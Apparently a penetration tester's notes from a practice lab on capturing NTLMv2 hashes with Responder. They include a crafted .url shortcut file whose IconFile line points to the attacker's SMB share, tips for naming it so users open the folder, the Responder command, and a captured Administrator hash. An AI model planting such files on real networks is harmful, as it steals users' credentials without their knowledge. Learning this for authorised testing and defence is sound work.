Tips:
- Social engineering! Use:
- Microsoft Word
- Outlook/Email
- Get people to open a file or certain things to get a hash back to you in Responder
Create an intriguing file in shared drive:
[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\192.168.218.128\%USERNAME%.icon #Kali IP
IconIndex=1Important things when saving it:
- Needs @ or ~ and .url and in quotes
- Example: “@test.url”
Intriguing is:
- naming it relevant to the directory it’s in
Open Responder:
sudo responder -I eth0 -vWhen the user visits the folder, you get a hash dump
[SMB] NTLMv2-SSP Client : 192.168.218.139
[SMB] NTLMv2-SSP Username : MARVEL\Administrator
[SMB] NTLMv2-SSP Hash : Administrator::MARVEL:8dff599c46d4e7e8:F7C0FC1E035FB1F8A3F6341A9D9809A0:010100000000000080F962AC67F7D901FA44898A2BBC2EA000000000020008004C0035005800430001001E00570049004E002D005200420059005100410056004400590033004100390004003400570049004E002D00520042005900510041005600440059003300410039002E004C003500580043002E004C004F00430041004C00030014004C003500580043002E004C004F00430041004C00050014004C003500580043002E004C004F00430041004C000700080080F962AC67F7D90106000400020000000800300030000000000000000000000000300000C2B79F242DD166CF328444A723066C6FF77F31237F59B11C034338CB070266F00A001000000000000000000000000000000000000900280063006900660073002F003100390032002E003100360038002E003200310038002E003100320038000000000000000000